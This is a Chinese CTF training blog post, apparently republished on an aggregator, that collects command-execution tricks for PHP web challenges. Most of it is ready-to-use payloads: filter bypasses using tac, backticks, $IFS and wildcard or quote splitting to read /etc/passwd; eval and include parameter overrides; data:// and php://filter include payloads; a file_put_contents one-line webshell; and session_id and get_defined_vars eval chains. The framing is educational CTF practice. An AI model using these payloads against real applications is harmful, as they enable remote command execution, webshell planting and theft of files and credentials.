【Ctfer训练计划】——命令执行的解题技巧(持续更新中)

这篇具有很好参考价值的文章主要介绍了【Ctfer训练计划】——命令执行的解题技巧(持续更新中)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

作者名:Demo不是emo 

主页面链接:主页传送门
创作初心:一切为了她
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:web安全,后渗透技术

每日emo:真的还有相见的机会吗

 ctf命令执行,Ctfer训练计划,安全,web安全,php

目录

一、关键字绕过 

1、cat限制绕过

2、$限制绕过

3、点号限制绕过(2023.1.4)

4、空格限制绕过

5、php限制绕过

二、另类变形写法 

1、eval双重参数覆盖(2022.12.31)

2、include双重参数覆盖(2023.1.3)

3、闭合双重参数绕过(2023.1.5)

4、data伪协议配合include函数命令执行

三、奇淫巧技思路

1、另类种马思路(2023.1.3)

2、highlight_file高级显示(2023.1.4)

3、字符串匹配(2023.1.4)

4、get_defined_vars()高级显示 

 5、session_start()配合session_id()命令执行

 四、常见操作 

1、通配符匹配(2023.1.4)

2、连接符绕过(2023.1.4)


命令执行也是ctf题型中比较常见的,这这些天ctf的训练中我也学到了很多新姿势,就想着写个博客记录一下,希望也能对大家解这类型的题提供帮助和思路

因为我还在不停的练习ctf,所以会不断记录一些新奇的解题姿势,也就是这篇博客会持续更新,建议点赞关注

一、关键字绕过 

1、cat限制绕过

在真实环境的命令执行漏洞的过滤中,cat命令一直是防范的重点,那cat命令被写死无法绕过的时候就可以试试这个命令——tac

可能很多小伙伴没听过过这个命令,其实这个命令功能跟cat命令差不多,看下面这个图你应该就明白了,这两个命令效果差不多

cat exp.py

tac exp.py

ctf命令执行,Ctfer训练计划,安全,web安全,php

 怎么样,这下清楚了吗?cat是从上往下查看tac就是从下往上就查看而已,但是tac命令知道的人少,所以很多都没有对tac命令进行一个过滤,所以cat命令被过滤时就可以尝试使用tac命令

顺带提一嘴,当cat和echo这些被过滤得很严重时,可以用cp命令把flag文件复制为txt文件,直接浏览器访问,这也是一种很好的方法 

2、$限制绕过

`命令`$(命令)都是执行命令的方式

反引号``是命令替换,命令替换是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出。语法:`command`

实例如下,可以看到同样的系统命令使用这两种方法都能执行,下面这两个命令的效果就相同

echo $(ifconfig);

echo `ifconfig`;

ctf命令执行,Ctfer训练计划,安全,web安全,php

跟上面的tac是一个道理,$(命令)的方法被大多数人熟知,一般都存在过滤,而`命令`的方法相对来说被过滤的可能性就低了许多

3、点号限制绕过(2023.1.4)

这个就是当点号(.)被过滤时使用,也没啥好讲的,就是用下面这个替换就可以了

pos(localeconv())

localeconv() 函数返回一包含本地数字及货币格式信息的数组。其中第一位就是点号

pos()函数就是取数组的第一位元素并返回,所以就得到了点号 

4、空格限制绕过

这个也没啥好讲的,下面这两种任意一种都能够达到空格的效果

%09
$IFS$9

以上两种任选一种替换空格都可以  

5、php限制绕过

 php的限制一般是用于防止后缀和嵌套php文件

后缀的话一般就用通配符就可以绕过了

限制嵌套php文件的话,若对传入的c进行php的过滤,那该怎么绕过呢?

例如原有这样一个语句

?c=data://text/plain,<?php system("cat flag.*hp");?>

 那就可以用如下语句代替

?c=data://text/plain,<?= system("cat flag.*hp");?>

 即等于号可以代替php文件标识处的"php"

可以看到,这样仍能执行

ctf命令执行,Ctfer训练计划,安全,web安全,php

二、另类变形写法 

1、eval双重参数覆盖(2022.12.31)

 就是将eval()函数的参数的值用另外一个参数传入,例如,这两句话效果是相同的

c=eval(phpinfo());

c=eval($_GET[1]);&1=system(phpinfo());

都能达到显示phpinfo的目的,如下

ctf命令执行,Ctfer训练计划,安全,web安全,php

ctf命令执行,Ctfer训练计划,安全,web安全,php 这个还是很有用的,用的也比较多

2、include双重参数覆盖(2023.1.3)

上面的eval()函数也可以换成include(),并且include可以不要括号,但是得配合伪协议中的php://filter来使用,如下

c=include($_GET[1])?>&1=php://filter/read=convert.base64-encode/resource=flag.php

或者加上括号也可以,如下

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

ctf命令执行,Ctfer训练计划,安全,web安全,php 这就是经过base64编码后的flag.php的内容

注意,这里的第二个参数,也就是要覆盖的参数(如上面的1)的值不仅仅只能是php的filter的伪协议,还可以使用其他的伪协议,例如data伪协议,如下

c=include$_GET[a]?>&a=data://text/plain,<?php system("cat flag.php");?>

3、闭合双重参数绕过(2023.1.5)

这个也用的非常多,在ctf题中一般就是让你传入一个值,对这个值进行大量的过滤和限制让你绕过,此时我们传入这个参数,但同时在值中引用其他变量,并直接构造闭合,如下

url/?c=eval($_GET[a]);>

此时过滤手段就会对c变量进行过滤和限制,但c我们其实没有太多敏感字符,此时我们再构造如下代码

url/?c=eval($_GET[a]);>&a=system(cat flag.php);

这样后面的a的内容就不能被检测出来,很多同学一看,诶,这和上面的思路有什么区别吗?自然是有的,上面我们只闭合了一次,再来看看这段代码

c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

可以看到这个姿势就更厉害了,c根本没有内容,那自然就不存在被过滤限制的情况,还能达到通过include检测文件的功能,岂不美哉?

4、data伪协议配合include函数命令执行

来看一个很熟悉的函数

include(filename)

 这里要将的方法就是include()函数其实是可以导致命令执行的,那就是配合data协议,当然也是有限制的,限制的就是

php.ini里面的allow_url_fopen和allow_url_include均为开启状态

 例如现在有一环境,需要我们传入c变量,传入的c将作为include函数的参数被执行,使用手法大概有如下三种

1、正常形式 ?c=data://text/plain;base64,<?php system('cat flag.php');?>

2、编码形式 ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

3、url形式  ?c=data://text/plain,%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%27%63%61%74%20%66%6c%61%67%2e%70%68%70%27%29%3b%3f%3e

第一种是正常形式,但是开发者一般都对传入的参数有限制,特别是ctf题目,所以用处不大,用的最多的还是第二种,编码一般就能把过滤给绕过了

第三种主打的就是一个出其不意,算是冷门招数,将后面我们要执行的语句全部换为url编码也可以执行

三、奇淫巧技思路

1、另类种马思路(2023.1.3)

 这个方法怎么说呢,有点另辟蹊径的感觉,大多数ctf题的命令执行都是对一些系统函数进行绕过,并没有限制写入文件什么的,所以可以直接利用file_put_content()函数或者其他的写入文件的函数,直接写一句话木马然后连接,一样能看到flag,如下

file_put_contents("abc.php", '<?php eval($_POST["cmd"]); ?>');

但有些出题人也会把权限写死,所以这种方法还是比较看运气的

2、highlight_file高级显示(2023.1.4)

这种方式就比较高级了,我们模拟一个需要以GET方式传入c,并会执行eval(c)的代码,同时在该目录下存在flag.phpindex.php,现在要求通过传入c变量来读取flag.php的内容,那下面这个方式传参就能达到目的,如下

?c=highlight_file(next(array_reverse(scandir("."))));

可能有些小伙伴连这段代码中的函数都不认识,这里先给大家介绍一下

scandir():是PHP中的一个函数,它可以用于扫描目录中的文件。它接受一个目录的路径作为参数,并返回该目录中文件的名称列表。

       当你将 "." 作为参数传递给 时,它将返回当前目录中的文件的名称列表。例如,如果当前目录中有文件 “file1.txt” 和 “file2.txt”,那么 将返回数组 。scandir()scandir(".")["file1.txt", "file2.txt"]

array_reverse():是PHP 中的一个函数,它可以将数组中的元素反转,并返回反转后的数组。

next():PHP 中的一个函数,它用于将数组的内部指针向后移动一个单位。它返回数组中当前指针位置的下一个元素的值。

highlight_file(): PHP 中的一个函数,它可以将文件的源代码转换为 HTML,其中的语法高亮显示。这对于展示文件的源代码或调试代码非常有用。

再来看看这条命令

 ?c=highlight_file(next(array_reverse(scandir("."))));

scandir(".")读取了当前文件夹的全部文件,并返回以文件名作为元素的数组

array_reverse(scandir("."))将结果字符串倒向,此时数组第一个元素是当前文件夹下最后一个文件,以此类推

next(array_reverse(scandir(".")))将内部指针向后移一位,内部指针最初执行第一位元素,现在指向第二位元素,也就是倒数第二个文件

highlight_file(next(array_reverse(scandir("."))))此时highlight_file()的参数就是当前文件夹目录下倒数第二个文件名,所以就会把这个文件的内容高亮处理并显示在浏览器上

因为我们的环境当前目录下只有两个文件, 第一个是flag.php,第二个是index.php,所以此时浏览器上显示的就是flag.php的内容,大家理解了吗?

有很多同学会问,这里只有两个文件,为什么要转向再用next()取到倒数第二个文件名(也就是第一个文件),而不是直接使用第一个文件名,即highlight_file(scandir(".")),

 那是因为这样会报错,当然具体的原因我暂时还不清楚,后面会了解后再来修改这里,同时在在这里也给大家介绍一个新的函数——reset()

reset()函数的作用就是将数组内部指针重新移动到第一个元素,跟next()函数换着用就可以。

同时还有show_source()函数,该函数和highlight_file()函数功能差不多,被过滤时也可以替换为这个试试。

ctf题一般当前目录下放着就是两三个文件,所以还是很实用的

3、字符串匹配(2023.1.4)

环境和上面一样,传入的c会被eval执行,要求读取到flag.php的内容,这个就是利用grep进行字符串匹配,绕过姿势如下

c=system("cat fl*g.php | grep  -E 'fl.g' ");

具体来说,它会使用系统的 “cat” 命令来输出文件名以 “fl” 开头且以 “g.php” 结尾的文件内容,并使用 “grep” 命令过滤掉不包含 “fl.g” 的行。最后,这个命令的输出会被赋值给变量 $c。

ctf命令执行,Ctfer训练计划,安全,web安全,php

4、get_defined_vars()高级显示 

这里假设的环境还是传入一个c变量,c变量会作为eval()函数的参数被执行 

这里的高级用法涉及的函数如下 

get_defined_vars() :返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。


array_pop() :是删除并返回数组最后一个元素。


current() :返回数组中的当前元素的值。


next() :返回数组中的下一个元素的值。

 由于get_defined_vars()返回的是一个多维数组,我们用current()可以获取到GET数组用next()可以获取到POST数组,然后用array_pop()取出POST数组里面的最后一个元素,再用eval执行就可以造成命令执行

先用get方式传入一个c变量,值如下

url/?c=eval(array_pop(next(get_defined_vars())));

 再用POST方式以cmd传入我们的恶意命令,例如系统命令

cmd=system("ls");

也可以传入phpinfo()之类的函数,效果如下 

ctf命令执行,Ctfer训练计划,安全,web安全,php

 5、session_start()配合session_id()命令执行

这里的模拟环境也是传入一个c变量,绕过一些限制后作为eval的参数执行,则有如下两种方式可造成命令执行,

第一种 

get传参如下 

c=session_start();system(session_id());

先来看看其中的函数 

session_start()函数用于创建一个新会话

session_id()函数用于获取当前会话(即cookie) 

system函数用于执行系统命令

此时传入的cookie就会被作为system函数的参数,造成命令执行

传入的cookie可以通过burp抓包修改或者f12中直接修改

如下

ctf命令执行,Ctfer训练计划,安全,web安全,php 效果如下

ctf命令执行,Ctfer训练计划,安全,web安全,php

 可以看到已经成功执行了我们的ls命令

同时这里cookie的值因为是被session_id()函数取出来的,session_id()函数并不能识别空格,但是这里也支持base64编码和写入小马,所以还是很好用的

但这种方法也有一个很大的弊端,那就是受php版本影响,只有5.5 -7.1.9可以执行,因为session_id规定为0-9,a-z,A-Z,-中的字符。在5.5以下及7.1以上均无法写入除此之外的内容,但是符合规定的还是可以的,比如我们这里的ls命令,那当然base64编码后可能就不行了,这是需要注意的

第二种 

 get传参如下

c=show_source(session_id(session_start()));

 show_source()函数:对文件进行语法高亮显示。

 那此时cookie的值就会作为show_source()函数的参数,被show_source()函数读取并显示在浏览器上,如下

ctf命令执行,Ctfer训练计划,安全,web安全,php

 这里的show_source()可以换成highlight_file(),两个效果一样

但需要注意的是这种方法同样都有php版本限制,因为使用了session_id()获取了cookie的值

 四、常见操作 

1、通配符匹配(2023.1.4)

常见的通配符如下

符号

含义

匹配单个字符如果匹配多个字符,就需要多个?连用

*

*代表任意数量的字符

[ ]

代表一定有一个在括号内的字符(非任意字符)。例如 [abcd] 代表一定有一个字符, 可能是 a, b, c, d 这四个任何一个

 例如

 一个常用的读取密码命令如下

cat /etc/passwd

使用了?通配符之后,他就可能有很多种变化,比如这两种,而这些亲测都是可以使用

​​​​​​​cat /?tc/?as?wd
cat /*tc/*as*wd

这里需要注意的也是一样,不要局限自己的思维,几种通配符也是可以搭配使用的

2、连接符绕过(2023.1.4)

单引号‘’,双引号“”,反斜杠`如:

c'a't' /'e't'c'/'p'a's's'w'd 

 ctf命令执行,Ctfer训练计划,安全,web安全,php文章来源地址https://www.toymoban.com/news/detail-779176.html

到了这里,关于【Ctfer训练计划】——命令执行的解题技巧(持续更新中)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • yolov8训练心得 持续更新

    目录 yolov8的改进点: 优化器 lion优化器,学习率0.0001,训练效果: 学习率衰减

    2024年02月15日
    浏览(42)
  • IDEA git操作技巧大全,持续更新中

    作者简介 目录 1.创建新项目 2.推拉代码 3.状态标识 5.cherry pick 6.revert 7.squash 8.版本回退 9.合并冲突 首先我们在GitHub上创建一个新的项目,然后将这个空项目拉到本地,在本地搭建起一个maven项目的骨架再推上去,全流程走一下一个项目从0开始如何托管给git,后文的操作也会基

    2024年02月08日
    浏览(45)
  • 前端知识点、技巧、webpack、性能优化(持续更新~)

    可以把  图片转换成  base64  放在src里面   减少服务器请求  但是图片会稍微大一点点 以上的方法不需要一个一个自己转化 可以在webpack  进行 性能优化   (官网有详细描述)

    2024年03月10日
    浏览(46)
  • 【六袆 - windows】windows计划任务,命令行执行,开启计划任务,关闭计划任务,查询计划任务

    您可以使用以下方法: 使用任务计划程序:任务计划程序是 Windows 内置的工具,可以用于创建、编辑和管理计划任务。您可以按照以下步骤查看已设置的计划任务: 按下 Win + R 键,然后输入 “taskschd.msc”,按 Enter 键打开任务计划程序。 在任务计划程序窗口中,您可以查看

    2024年02月12日
    浏览(42)
  • [CSAW/网络安全] Git泄露+命令执行 攻防世界 mfw 解题详析

    Home界面: Home界面翻译如下: 欢迎访问我的网站! 我自己从头开始写的! 您可以使用上面的链接浏览页面! About界面: 观察到 Git ,联想 Git泄露 Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管

    2024年02月06日
    浏览(57)
  • [蓝桥杯Python]算法练习、算法基础、算法训练、算法模板(持续更新)

    [蓝桥杯Python]算法练习、算法基础、算法训练、算法模板( 持续更新..... ) 目录 一、算法基础 1.Huffuman树 2.Sine之舞 3.数列排序 4.数列排序 5.特殊回文数 6.回文数 7.特殊的数字 8.杨辉三角形 9.高精度加法 10.Fibonacci数列 11.报时助手 12.回形取数 13.矩阵乘法 二、算法提高 1.印章

    2023年04月08日
    浏览(49)
  • Linux--crontab命令详解--循环执行的计划任务

    循环执行任务是由cron(crond)这个系统服务来控制的。用户想要建立循环的计划任务时,使用的是crontab这个命令,为了避免安全性的问题,和at一样,我们可以限制使用crontab的账号,可以使用的配置文件有: /etc/cron.allow 将可以使用crontab的账号写入,不在这个文件中的账户则不能使用cr

    2024年02月16日
    浏览(47)
  • Armbian常用命令(持续更新)

    1、更新内核的命令: 2、图形化配置界面 3、创建虚拟内存 4、安装常用软件 5、docker相关命令 6、挂载U盘 磁盘设备命名一般规则: 在Linux中,设备名称通常都保存在/dev里,/dev下的文件是特殊的设备文件,和特定的驱动程序相关联。而这些设备的命名有一定的规则,可以使用“

    2024年03月15日
    浏览(59)
  • Office技巧(持续更新)(Word、Excel、PPT、PowerPoint、连续引用、标题、模板、论文)

    选住 一级标题 ,之后进行“定义新的多级列表”    正常插入题注后就可以了。如果一级标题是 “汉字序号”,那么需要对题注进行修改: 从原来的 图 { STYLEREF 1 s }-{ SEQ 图 * ARABIC s 1 } 修改为 图 { Quote “二零二五年一月{ STYLEREF 1 s }日” @”d” }-{ SEQ 图 * ARABIC s 1 } 注

    2024年02月08日
    浏览(61)
  • Linux部署项目常用命令(持续更新)

    开放端口 关闭端口 配置立即生效 查看防火墙已开放端口 查看指定端口占用情况 查看全部端口占用情况 查看具体端口被哪个程序占用 kill被占用的进程 查看程序端口占用情况 重启命令 检查服务状态 检查nginx配置文件 关闭nginx服务 开启nginx服务 具体操作: ​进入tomcat的bi

    2024年02月09日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包